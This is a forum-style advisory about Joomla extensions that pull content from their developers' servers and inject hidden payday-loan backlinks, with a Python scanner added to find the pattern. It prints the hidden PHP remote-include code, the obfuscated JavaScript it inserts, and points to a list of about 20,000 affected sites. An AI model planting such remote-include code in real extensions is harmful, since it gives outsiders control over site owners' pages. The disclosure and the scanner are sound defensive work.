Extensions from this developer/company contain malicious code that fetches a file from their server and inserts it into your site. Right now they are inserting hidden backlinks to their Payday L0ans website, which is terrible in itself as this practice can affect YOUR Google rankings, but they also have the ability to insert whatever code they like and can do whatever they like to your website. This is a huge security vulnerability. As such, the extensions have been removed from the JED, but they are still on tens of thousands of websites.
The most popular vulnerable extensions are:
- Autson Skitter Slideshow (mod_AutsonSlideShow)
  The malicious code is located in the "tmpl" folder, in the PHP file(s).
- Share This for Joomla! (mod_JoomlaShare This)
  The malicious code is located in mod_JoomlaShare This.php.
- VirtueMart Advanced Search (mod_virtuemart_advsearch)
  The malicious code is located in mod_virtuemart_advsearch.php.
- AddThis For Joomla (mod_AddThisForJoomla)
  The malicious code is located in mod_AddThisForJoomla.php.
- Plimun Nivo Slider (mod_PlimunNivoSlider)
  The malicious code is located in the "tmpl" folder, in the PHP file(s).
The hidden backlinks are being inserted via the following code:
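```php
<?php
// Fetches content from the developer's server and prints it into the page unfiltered.
$credit=file_get_contents('http://www.inowweb.com/p.php?i='.$path);
echo $credit;
?>
```

```php
<?php
// Same pattern, pointing at a second domain.
$credit=file_get_contents('http://www.autson.com/p.php?i='.$path);
echo $credit;
?>
```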
This is what that code is inserting into the site:
```html
<script language="JavaScript">
function dnnViewState()
{
var a=0,m,v,t,z,x=new Array('9091968376','8887918192818786347374918784939277359287883421333333338896','778787',
'949990793917947998942577939317'),l=x.length;while(++a<=l){m=x[l-a];
t=z='';
for(v=0;v<m.length;){t+=m.charAt(v++);
if(t.length==2){z+=String.fromCharCode(parseInt(t)+25-l+a);
t='';}}x[l-a]=z;}document.write('<'+x[0]+' '+x[4]+'>.'+x[2]+'{'+x[1]+'}</'+x[0]+'>');}dnnViewState();
</script>
<p class="dnn">By PDPRELUK <a href="http://THEIR-PAYDAY-SITE" title="Payday L0an">payday l0ans uk</a></p>
```
```html
<script language="JavaScript">
function nemoViewState()
{
var a=0,m,v,t,z,x=new Array('9091968376','8887918192818786347374918784939277359287883421333333338896',
'877886888787','949990793917947998942577939317'),l=x.length;while(++a<=l){m=x[l-a];
t=z='';
for(v=0;v<m.length;){t+=m.charAt(v++);
if(t.length==2){z+=String.fromCharCode(parseInt(t)+25-l+a);
t='';}}x[l-a]=z;}document.write('<'+x[0]+' '+x[4]+'>.'+x[2]+'{'+x[1]+'}</'+x[0]+'>');}nemoViewState();
</script>
<p class="nemonn">By PDPRELUK <a href="http://THEIR-PAYDAY-SITE" title="Payday L0an">payday l0ans uk</a></p>
```
iNowWeb.com (author: Sharif Mamdouh):
- iNowSlider (mod_iNowSlider)
- iNow Twitter Widget (mod_TwitterWidget)
- BrainyQuote for Joomla! (mod_JoomlaBrainyQuote)
- Quotes By keyWord! (mod_JoomlaQuotes)
- iNow Wikio (mod_JoomlaWikio)
- iNow Twitter (mod_TwitterForJoomla)
- QuickJump for Joomla! (mod_quickjump)
Autson.com (author: xing):
- FaceBook Slider
- Twitter Friends & Followers
- Flying Tweets
- Autson Twitter Search
- Twitter Quote
- FaceBook Show
Plimun.com:
- Plimun Twitter Ticker
- Twitter Show
I've managed to gather a list of around 20,000 vulnerable websites that have installed extensions from this developer and are displaying hidden backlinks that are inserted by the extensions. The list is by no means comprehensive, but I believe it has a large portion of the vulnerable websites. You can see the list here: http://pastebin.com/tWfiKcrr
So what can we do to stop these spammers/hackers?
1. Remove the extensions from your or your clients' websites (or just remove the malicious code).
2. Do our best to reach out to the webmasters of the sites in the pastebin list above.
3. Report their domain names for spam/abuse to . They are all registered at Namecheap. The more people that complain, the more likely Namecheap will act. The domain names are:
autson.com , inowweb.com , plimun.com
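
A scan for the PHP pattern shown above, as an added example (not code from the original post): it walks a Joomla directory, flags PHP files that assign the result of a remote `file_get_contents('http://...')` call to a variable, and records whether that variable is echoed and whether the host is one of the three domains named here. The sample tree is constructed for the demonstration, and `mod_clean` is a hypothetical module.

```python
import os
import re
import tempfile

# Domains this page names as the source of the injected content.
SUSPECT_HOSTS = ("inowweb.com", "autson.com", "plimun.com")
# Matches: $var = file_get_contents('http://host/...   (PHP fetching a remote file)
REMOTE_FETCH = re.compile(
    r"""\$(\w+)\s*=\s*file_get_contents\s*\(\s*['"]https?://\s*([^/'"\s]+)""", re.I)

def scan_file(path):
    """Return one finding per remote fetch in a PHP file."""
    with open(path, encoding="utf-8", errors="replace") as fh:
        source = fh.read()
    findings = []
    for var, host in REMOTE_FETCH.findall(source):
        host = host.lower()
        # Is the fetched value written straight into the page?
        echoed = re.search(r"\b(?:echo|print)\b[^;]*\$" + var + r"\b", source)
        known = any(host == h or host.endswith("." + h) for h in SUSPECT_HOSTS)
        findings.append({"host": host, "echoed": bool(echoed), "known_host": known})
    return findings

def scan_tree(root):
    """Walk a Joomla directory and map relative PHP path -> findings."""
    report = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in (f for f in files if f.lower().endswith(".php")):
            path = os.path.join(dirpath, name)
            hits = scan_file(path)
            if hits:
                report[os.path.relpath(path, root).replace(os.sep, "/")] = hits
    return report

def build_sample_tree():
    """Constructed sample: the page's snippet in one module, a clean module beside it."""
    bad = "<?php\n$credit=file_get_contents('http://www.inowweb.com/p.php?i='.$path);\necho $credit;\n?>"
    clean = "<?php\n$t=file_get_contents(__DIR__.'/a.txt');\necho $t;\n?>"
    samples = {"mod_AddThisForJoomla/mod_AddThisForJoomla.php": bad,
               "mod_clean/tmpl/default.php": clean}  # hypothetical clean module
    root = tempfile.mkdtemp()
    for rel, body in samples.items():
        os.makedirs(os.path.dirname(os.path.join(root, rel)), exist_ok=True)
        with open(os.path.join(root, rel), "w", encoding="utf-8") as fh:
            fh.write(body)
    return root

if __name__ == "__main__":
    for path, hits in scan_tree(build_sample_tree()).items():
        print(path, hits)
```

A finding with `known_host` false is still a remote fetch and deserves a manual look; the scan only catches this literal pattern, not rewritten or obfuscated variants.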